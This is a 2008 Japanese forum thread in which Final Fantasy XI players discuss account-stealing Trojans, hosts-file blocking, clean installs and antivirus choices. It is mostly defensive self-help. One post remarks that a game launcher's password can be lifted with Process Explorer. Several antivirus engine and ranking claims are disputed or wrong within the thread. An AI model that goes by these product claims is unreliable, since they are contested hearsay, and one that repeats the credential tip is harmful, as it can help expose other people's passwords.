562 名前：既にその名前は使われています：2008/08/17(日) 08:11:56 ID:tdUsvM9m: >>560
PG2を導入したいのか、hostsの変更をしたいのか、どっちだ？
563 名前：既にその名前は使われています：2008/08/17(日) 08:46:39 ID:3vINh4rh: 誕生日は入れるのは知らないが大体のネトゲはメールで本人確認するよな
564 名前：既にその名前は使われています：2008/08/17(日) 09:49:04 ID:z6RysaBC: ＭＭＯジプシーしてきたが、今までパス変える時なんて
・今までのパス
・新しいパス
しか確認なかったな。
最近のはそうじゃないのかな？
565 名前：既にその名前は使われています：2008/08/17(日) 09:52:06 ID:7q/EfF4c: >>561
Ubuntu日本語ローカライズドイメージ

VirtualBox用仮想マシンのダウンロード
http://www.ubuntulinux.jp/products/JA-Localized/virtualbox

VMware用仮想マシンのダウンロード
http://www.ubuntulinux.jp/products/JA-Localized/vmware

>>560
ここを見て勉強。
http://lineage.paix.jp/guide/security/basic-ipfilter.html
IPフィルタを行うには、PG2導入やhosts変更のようにいくつか方法があるって話なので
PeerGuardian2を導入すればhosts変更する必要はない。
566 名前：既にその名前は使われています：2008/08/17(日) 09:57:44 ID:eUbFOXMx: なんかKarnaeghDrv.dllをふくむで検索したら
ワトソン先生のファイルがでてき内容みてみたら
結構前からもぐりこまれてたようだorz
567 名前：既にその名前は使われています：2008/08/17(日) 10:09:41 ID:X2rhc4LE: >>561
俺はVine,Fedora Core,knoppixとか使ってるかな。
568 名前：既にその名前は使われています：2008/08/17(日) 11:10:10 ID:9luk4BkM: ubuntuのfirefox3から書き込みテスト
569 名前：既にその名前は使われています：2008/08/17(日) 11:12:40 ID:9luk4BkM: お、いけるね
たまにメモリ不足と怒られるけどw
スレ違いごめんにょ
色々アドバイスあり
570 名前：既にその名前は使われています：2008/08/17(日) 11:17:02 ID:DhGA36YM: >>553,>>555
通報しました。逮捕乙
571 名前：既にその名前は使われています：2008/08/17(日) 11:17:14 ID:jHwIkWRn: >>523

RMTやってるやつならよくあることだな
他人に住所使われたんだろｗ
572 名前：既にその名前は使われています：2008/08/17(日) 11:21:17 ID:js27fiF3: >>571
うへwやつら顧客情報売ってるのかwwなにそれwww
客の情報バラまくって信じられないが
正規の商売じゃないし何に使われるかわからないもんだな。
573 名前：既にその名前は使われています：2008/08/17(日) 11:28:31 ID:U+s0vjdS: 893が手を出し始めてるらしいからな。
マネーロンダリングに最適だから。
574 名前：既にその名前は使われています：2008/08/17(日) 11:33:57 ID:L7Dh7rTD: ヤフオクで中古のPS2買ったんだが出品者が台湾人くさい名前だったんだが
PS2にウイルスなんてないよな？初期化しようにもナビゲータCDだけ起動しなくて・・・・
誰か詳しい人おしえてください・・・
575 名前：既にその名前は使われています：2008/08/17(日) 11:33:59 ID:z6RysaBC: >>572
普通の会社だって顧客情報を一社員が勝手に売ってたりするよ。
DMや電話が来る程度のだったら、どこから自分の情報がいったかわからないしね。
ヤフオクの相手とか、表だって利用してますって言えないRMT業者とかは、
やってると思ってていいぐらい。
576 名前：既にその名前は使われています：2008/08/17(日) 11:39:31 ID:bfdz50j7: ルーセントハートは生年月日で確認するな
他のメーカーのネトゲはメール確認する。

何もしないでアカウントが変更できるのは「ファイナルファンタジー１１」だけ
577 名前：既にその名前は使われています：2008/08/17(日) 11:41:16 ID:cZj0lDoj: >普通の会社だって顧客情報を一社員が勝手に売ってたりするよ。

だから、ムーミン谷だの赤坂御用地だので
スクエニへ住所登録したやつらを俺は笑えないｗ
578 名前：既にその名前は使われています：2008/08/17(日) 11:49:52 ID:z6RysaBC: オンラインで入力すること自体怖いって人もいるだろうしね
579 名前：既にその名前は使われています：2008/08/17(日) 12:48:21 ID:wcKO09Zm: ハックされて、レアアイテムの競売取引履歴から業者特定できたんだがｗ
まあ、復元する気も戻る気もないからどうでも良いんだけど。
580 名前：既にその名前は使われています：2008/08/17(日) 12:54:16 ID:rnLnuAyF: >>579
可能なら通報しといたら?
まーそいつもハクられたかLv1の捨てキャラかもしれんが。
581 名前：既にその名前は使われています：2008/08/17(日) 13:05:21 ID:sWBE72bZ: 今POL起動したらverisign(199.7.54(or51).190)に接続しにいったけど、テンプレにないけど平気だよね？
582 名前：既にその名前は使われています：2008/08/17(日) 13:18:37 ID:rnLnuAyF: verisign知らん奴いるのか…?
583 名前：既にその名前は使われています：2008/08/17(日) 13:24:59 ID:0sAymbfo: とりあえずググればいいのに
584 名前：既にその名前は使われています：2008/08/17(日) 13:39:44 ID:ivm6O+v+: >>579
復元も復帰もはしなくて良いからスクエニに伝えて警察に届けだして＞＜
585 名前：既にその名前は使われています：2008/08/17(日) 13:44:43 ID:Q1f1Z/IM: >>576
必死すぎ？
586 名前：既にその名前は使われています：2008/08/17(日) 13:55:38 ID:9luk4BkM: ググったらガマニアで吹いた
587 名前：560：2008/08/17(日) 14:22:38 ID:ndqT0NUw: >>562
わかりにくい表現になってました。すみません。
サイトでは、PG2導入と、Hostsの変更が紹介されていたため、わかりにくい表現をしてしまいました。
Hostsの変更に関してお伺いしたいです。

ファイル名を指定して実行
notepad %Systemroot%\system32\drivers\etc\hosts

これでHostsがメモ帳で開かれます。
ここで、危険URLの設定を追加編集したところまではいいのですが、
保存の形式がtxt形式でしか保存ができません。
txt形式で保存し、
notepad %Systemroot%\system32\drivers\etc\hosts
を再度おこなうと、編集に失敗しているようでした。
588 名前：既にその名前は使われています：2008/08/17(日) 14:28:45 ID:rnLnuAyF: 上書き保存するか拡張子削ればいいだろ
589 名前：560：2008/08/17(日) 14:45:34 ID:ndqT0NUw: >>588
上書き保存に関してですが、ctrl+s操作するとメモ帳の題名で「！」マークの警告がでます

ファイルC:WINDOWS\syustem32\drivers\etc\hosts　を作成できません。
パスおよびファイル名が正しいか確認してしてください

と出ます。その後、OKを押すと名前をつけて保存の操作に自動的に移行します。
保存のファイル名をhostsとしておりますが、ファイルの種類がテキスト文書 (*txt)かすべてのファイルの２択だけ
文字コードはANSIが指定されております。ほかの選択肢にUnicodeやUTF-8などがあるようです。
590 名前：既にその名前は使われています：2008/08/17(日) 14:48:40 ID:rnLnuAyF: とりあえずhosts.txtとして保存、hostsを削除してhosts.txtをhostsにリネームでいいんじゃね?
削除できないなら何らかのプロセスがロックしてるんだろう。
あと「メモ帳の使い方」みたいのはPC初心者板かWindows板でやってくれ。
591 名前：既にその名前は使われています：2008/08/17(日) 14:50:34 ID:JuDLRLHu: POL→FF11に切り替わるところで
問題が発生したためPol.exeを終了します。
とメッセージが出て起動できないのですが、ただのエラーでしょうか？
PCの再起動をしてもこの症状が出てしまってプレイできません。
POLには普通にログインできるのですが、FF11に切り替わらないです。
592 名前：既にその名前は使われています：2008/08/17(日) 14:55:51 ID:rnLnuAyF: >>591
なんとも言えません(ビデオカードやドライバの問題、etc.)。
593 名前：既にその名前は使われています：2008/08/17(日) 14:56:28 ID:Dvpxc276: まずはファイルチェックとか
594 名前：既にその名前は使われています：2008/08/17(日) 14:57:41 ID:ZNhtwA8S: それもうやばいんじゃねーの？
どうにかして速攻でパスを変更してから他の原因を考えろ
595 名前：既にその名前は使われています：2008/08/17(日) 14:57:46 ID:jBwu4CfK: >>591
GF8000系はPOLフルスクリーンだとFF11の起動で落ちるってバグがあった気がする。
596 名前：既にその名前は使われています：2008/08/17(日) 14:59:04 ID:u+7BYvIL: >>560
vistaユーザなら
ttp://support.microsoft.com/kb/923947/ja　参照
597 名前：560：2008/08/17(日) 15:01:04 ID:ndqT0NUw: >>590
リネームは盲点でした。解決することができました。ありがとうございます。
598 名前：既にその名前は使われています：2008/08/17(日) 15:03:44 ID:Q/CzFlgR: >>576
>何もしないでアカウントが変更できるのは「ファイナルファンタジー１１」だけ

FFだけってのは嘘杉ｗ
現行パスワードで変更できるものはごまんとある。
むしろ確認するもののほうが少ない。

もちろんだからFFは現状でOK！と言ってるわけじゃないから念のため。
599 名前：既にその名前は使われています：2008/08/17(日) 15:04:25 ID:78w4B9Oy: >>591
公式の窓化は、たとえ窓化でも他に全画面使うアプリがあったらエラーで落ちることがある
FFよりも他の要因の可能性が高いと思う
600 名前：既にその名前は使われています：2008/08/17(日) 15:05:21 ID:4AHbM+5m: パス入力ミスするだけで、ドキドキオンライン
601 名前：既にその名前は使われています：2008/08/17(日) 15:07:24 ID:ZNhtwA8S: ルーセントなんちゃらとかいうの認証鯖が逝かれて再認証がどうとか問題になってるみたいだな
何かの釣りなんじゃね？
602 名前：男神：2008/08/17(日) 15:08:41 ID:xxzWCewz: やぱパス保存と入力なら　その都度入力のが安全なのかな？
603 名前：既にその名前は使われています：2008/08/17(日) 15:10:18 ID:JuDLRLHu: >>593
ファイルチェックしてもなにも直すところがなかったです

>>594
Polには一応接続できたのですが心配なので変えておきました

>>592,595,599
他に起動してたのはJaneとフォルダ少し開いている程度でしたがエラーが出ました

スキャンし終わったspybotとを閉じたらなぜかつながりました。
お騒がせしました、ありがとうございました。
604 名前：既にその名前は使われています：2008/08/17(日) 15:10:32 ID:ZNhtwA8S: 保存は絶対らめぇ
605 名前：既にその名前は使われています：2008/08/17(日) 15:12:27 ID:frCT97dE: パスワードを”tenanmon○○○○”とかにしてみるか
606 名前：既にその名前は使われています：2008/08/17(日) 15:22:27 ID:y3I8wIMu: 自分の場合はIME2008?か2007どっちか忘れましたがそれのエラーで落ちてました
ATOKに変えて治りました
607 名前：既にその名前は使われています：2008/08/17(日) 16:36:25 ID:ZQGp5+Xy: >>606
IMEってVistaとなんか競合起こってこの前修正きてなかったっけ？
608 名前：既にその名前は使われています：2008/08/17(日) 16:46:45 ID:y3I8wIMu: >>607
自分はXPなのでなんともいえないです・・・
609 名前：既にその名前は使われています：2008/08/17(日) 17:21:08 ID:ynw86BdL: >>553はなんのウイルスなんですか？
610 名前：既にその名前は使われています：2008/08/17(日) 18:57:44 ID:rnLnuAyF: >>601
公式が混んでるだけ。
ガマニアの認証の仕組みとしてはガマニアのocx(ActiveXコントロール)をIEに食わせて
IEから起動するというクソ実装(アカハック楽チン)なんだが、
ocxからexeに渡されるパスワードをProcessExplorerなどで
ショートカットにコピペしておけば直接起動もできる。
611 名前：既にその名前は使われています：2008/08/17(日) 19:15:17 ID:JyGMjVGa: hostsファイルが消えちゃってるんだが
hostsファイルってなくても大丈夫なものなの？
612 名前：既にその名前は使われています：2008/08/17(日) 19:17:58 ID:gFmyAFmf: >>611
勝手に消えるはずはない
多分マルウェアに消されたんだろう
テンプレ見てオンラインスキャンしたほうがいい
あと、安全な環境からPOLのパス変更も
613 名前：既にその名前は使われています：2008/08/17(日) 19:18:24 ID:rnLnuAyF: >>611
2000でもXPでもデフォルトでhostsはある。
XREAでばら撒かれているトロイ(KarnaeghDrv.dll KernaeghDrv.dll etc)などは
(hostsに危険ホストを書いて阻止する人を乙らせるために)
hostsを削除する機能を持っている。
614 名前：既にその名前は使われています：2008/08/17(日) 19:31:26 ID:rnLnuAyF: XREAトロイについて補足すると、事前に全機撃墜したのは
(意外だけど)MicrosoftのOneCare。OneCareはパッケ売りだけど
OneCarePCセーフティってのがタダで使えたはずなのでお試しを。
ttp://onecare.live.com/site/ja-jp/
Kasperskyのスキャンも併用していい
(AntiVirとKasperskyに関しては検体を送って数時間で対応されている)。

OneCareの次点でVBA32(全機撃墜、ただしdllやrootkitは見逃すので
感染後=駆除には使えないし、敷居が高い)。
さらに次点でDr.WEB(最近の数匹見逃し)。
他はどんぐりの背比べ。
615 名前：611：2008/08/17(日) 20:54:56 ID:JyGMjVGa: あ、KarnaeghDrv.dllにきされてたのか、、、
セーフモードで完全スキャンとかして駆除はしたんだ
アカは現在凍結中
明日クリーンインストールする予定
hostsファイルはベクターだっけか、そういうとこで配布されてる
マルウェアとかに対応した奴を入れても大丈夫ですか？
616 名前：既にその名前は使われています：2008/08/17(日) 21:04:18 ID:rnLnuAyF: デフォのhostsは中身空だよ。
後はお好きに。
617 名前：既にその名前は使われています：2008/08/17(日) 21:37:42 ID:VXFtCJaq: こんな間違いをしているのは自分だけだと思うが念のため

＠niftyのオンラインスキャン＝カスペオンラインスキャンではなかった
＠niftyのオンラインスキャンはカスペのウイルスのみのスキャン・駆除・削除、スパイウェアはできないと書いてある

他社と併用するため、＠nifty使っていたけどスパイウェアはできないのに気づいた
618 名前：既にその名前は使われています：2008/08/17(日) 22:08:35 ID:jlKNaNa3: OneCureのオンラインのやつはタダで使える。
が、ウィルス見つけて除去はしてくれるが詳細は見られない仕様っぽいですね。
619 名前：既にその名前は使われています：2008/08/17(日) 22:27:13 ID:r6Gg8rLO: このスレ見てるとノートンとかの大御所は「トロイ感知全然ダメだのぅ」と感じる。
ゲームアカウントハックに対して親身で面倒みてないつか、何のサービスしてるのか
不安になるわ。

来年度版からは糞ノートン（「先生」の称号剥奪！）買うのやめて、カスペル大先生にしようと決心した。
620 名前：既にその名前は使われています：2008/08/17(日) 22:36:36 ID:n2ZML/tQ: http://www.atmarkit.co.jp/news/200805/16/kaspersky.html
ちなみにOneCareはカスペと同じもん
俺は扱いやすいOneCareをオススメする
621 名前：既にその名前は使われています：2008/08/17(日) 22:38:58 ID:gFmyAFmf: >>619さんの意見はそれはそれで正しいんだけど、去年から
この一連のスレを読んでいればウイルス対策ソフトの種類より、
脆弱性対策パッチの適用とそのための情報収集のほうが
効果的だとわかるはずなのですよ。
FFのアカウントハックに関しては、このスレで十分に情報を
集められるはずです。
622 名前：既にその名前は使われています：2008/08/17(日) 22:43:09 ID:D9TNRXLZ: 二回アカハックくらうと巻き戻しできないのが痛いな。
623 名前：既にその名前は使われています：2008/08/17(日) 22:47:59 ID:rnLnuAyF: >>620
同じじゃないぞ…。
624 名前：既にその名前は使われています：2008/08/17(日) 22:51:06 ID:n2ZML/tQ: Windows Live OneCare 2.0
http://kakaku.com/item/03501722054/
1年2580円で3ユーザー

Kaspersky Internet Security 7.0 優待版
http://kakaku.com/item/03505021692/
1年4100円で1ユーザー

検出率は同じ
625 名前：既にその名前は使われています：2008/08/17(日) 23:00:22 ID:Pu93EOLn: オンラインスキャンでも自分のソフトでも検索出来なかったんですが
これって感染してないってことかな？
クリーンインストールしなくても大丈夫でしょうか？
626 名前：既にその名前は使われています：2008/08/17(日) 23:01:41 ID:aiLyHBoQ: >>624
上はgameシーフ検出しなかったわ・・・
627 名前：既にその名前は使われています：2008/08/17(日) 23:03:09 ID:gFmyAFmf: >>625
残念ですが、誰も安全を保証できません。

Wikipedia:悪魔の証明
この項の2
http://ja.wikipedia.org/wiki/%E6%82%AA%E9%AD%94%E3%81%AE%E8%A8%BC%E6%98%8E
628 名前：既にその名前は使われています：2008/08/17(日) 23:04:14 ID:mbrclJMc: >>625
ハックされたことがあるかないかで違ってくる
無いのなら今のところ大丈夫なんじゃない？って程度。それでも
太鼓判は押せないけど。
ハックされた上で「ウイルス見つからないけどクリーンインスコいらないよね？」って
言ってるのならグーで殴る
629 名前：既にその名前は使われています：2008/08/17(日) 23:15:38 ID:n2ZML/tQ: http://www.virustotal.com/jp/analisis/0a2db5efd99ec9e7bf45d127bdcc4707
これはwzcsvbxm.dllの3個目の検体
発見された時点で国内で販売してるので対応してたのはOneCareだけ
カスペルスキーのエンジンにOEM先の独自のチューニングが施されるから未知のウィルスに対しては大元のカスペとどちらが優れてるとは言えないが平均して同じだろう
630 名前：既にその名前は使われています：2008/08/18(月) 00:16:35 ID:PHsjYJFY: >>629
OneCareにKasperskyエンジンは入っていないと何度言ったら…。
鯖向けのForefrontと勘違いしてね?
631 名前：既にその名前は使われています：2008/08/18(月) 00:26:02 ID:YLmaj01/: 検知力テスト（2008年8月16日）
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/

Rank Detects Missed Product
1st 97% 95 AntiVir
2nd 96% 106 Webwasher-Gateway
3rd 94% 171 Ikarus
4th 93% 205 BitDefender
5th 92% 251 AVG
6th 92% 252 F-Secure
7th 89% 355 Avast
8th 88% 371 Sophos
9th 88% 373 Norman
10th 85% 472 Kaspersky
11th 85% 475 ClamAV
12th 84% 510 Microsoft

同じもんだというのは最近の検出率が証明しとる
632 名前：既にその名前は使われています：2008/08/18(月) 00:34:44 ID:PHsjYJFY: だめだこりゃ
633 名前：既にその名前は使われています：2008/08/18(月) 00:35:14 ID:YLmaj01/: MS、Forefrontセキュリティ製品ラインを5000万ドルでテコ入れ
http://www.itmedia.co.jp/enterprise/articles/0707/13/news012.html
「Forefront Client Security」は、OneCareと同じアンチウイルス／アンチスパイウェア技術をベースにしている。

最近になってカスペにエンジンが変わった
634 名前：既にその名前は使われています：2008/08/18(月) 00:35:46 ID:Ev36gbZN: >>632
お前が馬鹿（笑）
635 名前：既にその名前は使われています：2008/08/18(月) 00:38:05 ID:YLmaj01/: http://www.sofmap.com/product_detail/exec/_/sku=10831367/-/gid=SW03010000
「Windows Live OneCare 2.0」には、マイクロソフトのビジネス向けセキュリティソリューション製品であるMicrosoft Forefrontと同じウィルス検出エンジンを使用することで、検出性能をより一層向上しています。また、1本で3台までのPCにインストールすることが可能な上、
ホームネットワーク内のコンピュータを一括管理するOneCareサークルは最大3台までのPCを管理できます。
636 名前：既にその名前は使われています：2008/08/18(月) 00:40:33 ID:bIAZujdk: ID変えて必死なのがいるようですねえ
637 名前：既にその名前は使われています：2008/08/18(月) 00:43:00 ID:Ev36gbZN: >>636
お前のことか（笑）（笑）
638 名前：既にその名前は使われています：2008/08/18(月) 00:45:25 ID:4I13vvd5: そんなにあおり愛しなくてもいいじゃないか！
みんなで自衛してるわけだし争う理由はないと思うんだ
639 名前：既にその名前は使われています：2008/08/18(月) 00:49:10 ID:YLmaj01/: Forefrontは企業向けのブランドで自分の好きなメーカーのエンジンを選べるから検出ランキングで使われる事は無いよ
MSはもう自社エンジン諦めた
640 名前：既にその名前は使われています：2008/08/18(月) 00:50:21 ID:dFbgkzOG: とりあえずまだ続けるつもりならセキュ板あたりに場所移しておくれ
641 名前：既にその名前は使われています：2008/08/18(月) 00:54:04 ID:Ev36gbZN: >>640
負け惜しみか（笑）（笑）（笑）
642 名前：既にその名前は使われています：2008/08/18(月) 00:56:34 ID:YLmaj01/: http://gdata.co.jp/press/archives/2008/08/9g_data.htm
●7月の検出率順位　製品名　検出率
01位　G DATA アンチウイルス2008　　　　　　　　99.47%
02位　Norton アンチウイルス2008　　　　　　　　 99.21%
03位　Kaspersky アンチウイルス7.0　　　　　　　98.64%
04位　Windows ライブワンケア　　　　　　　　　 98.23%
05位　F-Secure インターネットセキュリティ 2008 97.92%

上位5位の中でNorton以外はカスペエンジン
この中でNorton以外の安いの選ぶのが良い
643 名前：既にその名前は使われています：2008/08/18(月) 00:57:29 ID:4I13vvd5: いつもの変なのだから気にしちゃだめですよ？
644 名前：既にその名前は使われています：2008/08/18(月) 01:01:02 ID:PHsjYJFY: OneCareスレでもデマ広めてたよ
645 名前：既にその名前は使われています：2008/08/18(月) 01:02:42 ID:Bq6/IcfA: OneCareVersion2.5からはカスペエンジンだぞ
646 名前：既にその名前は使われています：2008/08/18(月) 01:07:18 ID:YLmaj01/: G DATAはAvastとカスペ両方のエンジン組み合わせてるから糞重い
F-Secureは企業でよく配られてるから使ってる人も多いと思う
F-Secureからカスペに乗り換えようなんてことは考えるなよｗ
647 名前：既にその名前は使われています：2008/08/18(月) 01:16:58 ID:YLmaj01/: >>645
2.0からだろ
去年の年末に一気にカスペに並んだからな
648 名前：既にその名前は使われています：2008/08/18(月) 01:18:51 ID:ca4DKyBB: 必死＝暇つぶしだから相手しないよーにー

順位が高い＝最強でもないから、皆勘違いしないよーにー
(てか、PCの状況によってはこの順位すらコロコロ変わるから、信頼度は無い)

ってか、最強厨の語りなんて日常茶飯事だろこの板じゃ。
649 名前：既にその名前は使われています：2008/08/18(月) 01:21:03 ID:PHsjYJFY: つ ttp://www.virustotal.com/analisis/ec78db45f7bc03ba1a5d57f26f16ad69
650 名前：既にその名前は使われています：2008/08/18(月) 01:22:02 ID:LPXAzHU0: >>649
パス抜かれた;;
651 名前：既にその名前は使われています：2008/08/18(月) 01:23:02 ID:/u/ZFoEv: またウィルスソフトでなんたらかんたらですか
このスレは感染したらクリーンインストール推奨なんだから
ウィルスソフトなんてなに入れてても同じでしょうに
感染しない状況を自分で考えない限り感染はするんだから・・・ｗ
652 名前：既にその名前は使われています：2008/08/18(月) 01:24:58 ID:7nFPeQGy: 業者があおってんじゃね？
653 名前：既にその名前は使われています：2008/08/18(月) 01:32:07 ID:PHsjYJFY: >>651
アカハックに投入されるスクリプトを見ている限りは
MicrosoftUpdateとFlashPlayerの更新だけで9割以上(脳内統計)は減る気がする。
654 名前：既にその名前は使われています：2008/08/18(月) 02:00:27 ID:j5eu0YWp: ウィルスソフトって、感染しにくくする”ワクチン”であって、
罹病してからの”治療薬”って考えは、ちょっとまずい、と思うんだ……

で、クリーンインストールって、推奨もナニも、ネットワーク管理からみたら、
クライアントとしてウィルスにかかったら最低限やってもらわないと困ることの一つなんだけど……

ネットワークの安全はクライアントの協力あって成り立つことです。
だから、いつも完全にきれいなＰＣで接続してくれないと困んだけどなぁ。
655 名前：既にその名前は使われています：2008/08/18(月) 02:06:35 ID:/u/ZFoEv: >>654
感染「しにくくする」という認識は間違ってますよ
感染は、いまあるウィルス対策ソフトのどれを入れてもするんです
ワクチンとは、入ってきたウィルスを殺すためのものであり
感染を事前に防ぐものではありません
656 名前：既にその名前は使われています：2008/08/18(月) 02:13:54 ID:P1PnbBZl: >>654
大体同意
でもなんでそんな上からの目線なの？

>>655
備えっていみでないの？
657 名前：既にその名前は使われています：2008/08/18(月) 02:16:55 ID:g4q68L1o: 所で、あまり詳しくないんだが
wzcsvbxm.dllとかdllってのはダイレクトライブラリだっけ？
これはウイルス本体が参照する辞書のようなもので消しても、一時的に
ウイルスが起動できなくなるだけで本体は無事なんだよね
疑問なんだが、これらのdllを使ってるウイルス本体って判明してないの？
よくdll見つかったら消してもダメなのでクリーンインストールって聞くけど
本体ってなんとかして見つけれないものかな？
658 名前：既にその名前は使われています：2008/08/18(月) 02:24:33 ID:6HmPxpcb: >>656
上から目線ではないような気がするが

>>657
dllだからクリーンインスコするわけじゃないぞ？ウイルスは大体レジ改竄したりするからな
一般の人間に通常のレジと書き換え後がわかるわけも無く、またレジをいじって直すのは非常に面倒

結果、クリリンが一番早くて楽なだけだ
659 名前：既にその名前は使われています：2008/08/18(月) 02:26:00 ID:HFFiyTj5: >>657
それを見つけて各方面に検体提出したのがここのスレなんだけど、PC内で見つけた人が
dll自体を削除しても復活してしまうとか言ってたねー。

でもウェブページ上にjsで仕込まれてるウイルスの方も検体出してくれてる人いたよね？
660 名前：既にその名前は使われています：2008/08/18(月) 02:26:29 ID:g4q68L1o: するとレジストリが変更されたら知らせるようなソフトがあると
ウイルスに気付いたりできるのかな
661 名前：既にその名前は使われています：2008/08/18(月) 02:26:35 ID:/u/ZFoEv: >>656
「感染しない」とか「感染しにくい」という認識がウィルス対策ソフトに
あるから、ウィルス対策ソフトさえ入れておけば大丈夫だと思っている
人が多すぎなんですよね
たとえば「風邪予防のマスク」みたいにウィルス対策ソフトを考えている
人って結構多いですよ

PCにウィルスが入ってくることを防止するソフト(未知のものは別ですけど)は
通信を監視してればできるはずなのに、まだそういうソフトってないですよね
まぁ、ネット環境がものすごく重くなるから使い物にはならないだろうけど
662 名前：既にその名前は使われています：2008/08/18(月) 02:28:11 ID:/u/ZFoEv: >>660
それがHIPSといわれるソフトです
663 名前：既にその名前は使われています：2008/08/18(月) 02:28:25 ID:6HmPxpcb: >>660
とっくにあるがな、そしてスレ違い
664 名前：既にその名前は使われています：2008/08/18(月) 02:28:30 ID:HFFiyTj5: >>660
spybotの付属のやつを使った人がいたと思うけど、レジストリ変更自体は
物凄く頻繁に起こってるらしいから、許可ばっかり連打してるうちに肝心の
ウイルスによる改竄を見逃してしまいそうとか言ってた気がする
665 名前：既にその名前は使われています：2008/08/18(月) 02:30:25 ID:/u/ZFoEv: >>663
すれちではないですよ
ここのテンプレにもありますし
666 名前：既にその名前は使われています：2008/08/18(月) 02:35:14 ID:fpEqPXPi: >>659
wzcsvbxm.dllの分離が行われたシステムで、wzcsvbxm.dllが再度復活してたって報告は記憶にないなー。
wzcsvbxm.dllがサービスとして常駐していた場合に、レジストリを修正してもその常駐しているwzcsvbxm.dllがレジストリを書き戻しにくるってことｗ
それと悪さするやつはこいつだったとしても、こいつを生成したドロッパが特定できてなかったからね。
ドロッパがPC内に残っている可能性もあったわけだし、クリンスコしちゃったほうが確実だねってことでクリンスコしれって言ってたのよｗ
667 名前：既にその名前は使われています：2008/08/18(月) 02:40:59 ID:YcSMqfAI: 復元作業は１ヶ月以上かかるみたいですね。
当初、混み合っているので２週間はかかると言われたんですけど
被害者が増えているんでしょうかね･･。
668 名前：既にその名前は使われています：2008/08/18(月) 03:08:48 ID:PHsjYJFY: >>657
いや、うーん、それがトロイ本体。
トロイがトロイを産み落とすとか言うと頭がおかしくなって死ぬので
産み落とす親のことをドロッパとも言う。

ドロッパの役割はトロイを(自身から切り離すかネットから拾ってくるなどして)
適切な場所(system32など)に配置し、レジストリに書いて常駐させること。
物によってはトロイが消されたらまた配置すること。
669 名前：既にその名前は使われています：2008/08/18(月) 03:11:43 ID:/u/ZFoEv: HIPSに関してちょっと書いておきます

Spybot附属のTeaTimerは比較的監視は甘めですね
それほど頻繁に許可・不許可を聞いてきません
これは本体の設定が推奨レベルの設定だからかも知れませんけど

なにかあると必ず聞いてくるのがUnleakです
設定はデフォルトに近い形で使っていますが、しばらく自分の環境を
学習させないと作業に支障が出るくらい聞いてきます

Windows defenderにもHIPS機能があるようですね
こちらは、なにがシステムの変更を行おうとしているのかの通知が甘いです
(Vista標準装備でしたっけ？)

このみっつを同時に入れてシステム監視させていますが、Unleakを入れた
環境でSpybotの全サーチをさせると、レジストリ関連の検索結果で動作不全が
出てくるようで、テンプレには複数入れるのはおすすめではないと書きました
670 名前：既にその名前は使われています：2008/08/18(月) 04:26:44 ID:XTsvNOqh: 以前誤売却や誤破棄したアイテムの復旧サービスを受けたことあるんだけど、ハック受けた場合の復旧とは別物？
あれも１回きりのようだが共通だったらやだな・・・
671 名前：既にその名前は使われています：2008/08/18(月) 06:00:40 ID:Xm9tE+xv: アイテム復旧救済とハック復旧救済を
どうやったら同じサービスだって考えるに至ったかをまず知りたい
672 名前：既にその名前は使われています：2008/08/18(月) 06:22:59 ID:4b4/lVV7: おまいら喧嘩すんな
ウィルスバスター（2008）使いだが感染してないぞ。
因みにVistaなんでPeerGuardian2も導入してない。（出来るらしいけど分かりづらかったんでやめた）

ただ、ここでアップデートの報告上がるより先にフラッシュのVUしてたり
垢ハク騒ぎの始まった去年の秋からIEやIE系の専ブラは使わず、基本もjavascriptも切り、
と当たり前な事だけれど基本的な事を早くからしてた、ってのあるけど
673 名前：既にその名前は使われています：2008/08/18(月) 06:39:37 ID:QQpV5Nsf: >>672
VB2008だけどフラッシュ古かったせいでハックされたぞ？
VB2008は検出できてないから、他のにかえないと死亡
674 名前：既にその名前は使われています：2008/08/18(月) 06:40:31 ID:2HrM8Jck: 後半も読んでやれよ
675 名前：既にその名前は使われています：2008/08/18(月) 06:48:57 ID:QQpV5Nsf: >>674

全部よんだ上でVBは危険だっておしえてんの。
フラッシュプレイヤーを最新にしたからVBだけど運良く一歩手前で安全だったんだよ　ってな。
676 名前：既にその名前は使われています：2008/08/18(月) 07:02:21 ID:UoKrm1r4: セキュリティは、責任者が安心した時点で劣化する
セキュリティを破ろうとする者は努力や変化を忘れない
677 名前：既にその名前は使われています：2008/08/18(月) 07:03:57 ID:2HrM8Jck: Flash最新じゃなかったのはVBのせいですか
そこはセキュリティサイト購読するなり
SecuniaいれるなりHIPS入れるなりししてくださいよ

ウィルスソフト一本で安全安心なんて思ってるからやられるんでしょ
678 名前：既にその名前は使われています：2008/08/18(月) 07:07:05 ID:bwCOGLhh: 俺もVBだけどハックはされてないよ。
今後はどうなるか知らんけど。
679 名前：既にその名前は使われています：2008/08/18(月) 07:36:18 ID:gF5Ub0PO: 質問なんだけど、
カスペルスキーって２垢、３垢用のパックって売ってるかな？
680 名前：既にその名前は使われています：2008/08/18(月) 08:21:58 ID:FfpHnx3h: >>679
売ってるよ。
681 名前：既にその名前は使われています：2008/08/18(月) 08:50:51 ID:gF5Ub0PO: ㌧クス
682 名前：既にその名前は使われています：2008/08/18(月) 11:25:15 ID:e9jIEgRL: PCのことはよく分からないんだけど
ブログ記事を投稿した瞬間に突然FFXIに全く関係ない宗教サイトみたいなのの宣伝コメみたいのをされ、携帯からURLへ飛んでみたら、とりあえずはRMTとか業者とは関係ない普通っぽいサイト(まぁ、怪しげな宗教サイトですがｗ)でしたが…
今やあからさまなFFXI系の宣伝URLってのは警戒されて誰も踏まないので、こういった全然関係なさそうなとこにもウィルスを仕掛けてる場合もあるんじゃないかな？とおもって、書き込みしてみました。

実際そこに罠組み込まれてるのかどうかは自分では分からないんだけど、URLのっけたほうがいいですか？
683 名前：既にその名前は使われています：2008/08/18(月) 11:53:16 ID:PHsjYJFY: >>682
自分で黒判定できないならまず >>68
684 名前：既にその名前は使われています：2008/08/18(月) 12:24:54 ID:nH8boAmY: ネトゲはやったことないんだけど、XREAのFlashウイルス騒ぎ以降PG2を導入した者です。

で、シャットダウンに時間がかかるのって、PG2のせいということはない？
自分も時間かかるようになってしまって、
だけど試しにPG2を終了させてからWindowsをシャットダウンするようにすると
大丈夫みたいなんだけど…

バージョンはPeerGuardian 2.0 Beta 6bです。
685 名前：既にその名前は使われています：2008/08/18(月) 12:28:23 ID:9p44RDkJ: まずカスペのスキャンとかしてウィルスないのを確認したほうがよくないか？
pg2でシャットダウンが気になるほど遅くなったって報告は見ないしね
あとは>>1読んで欲しい
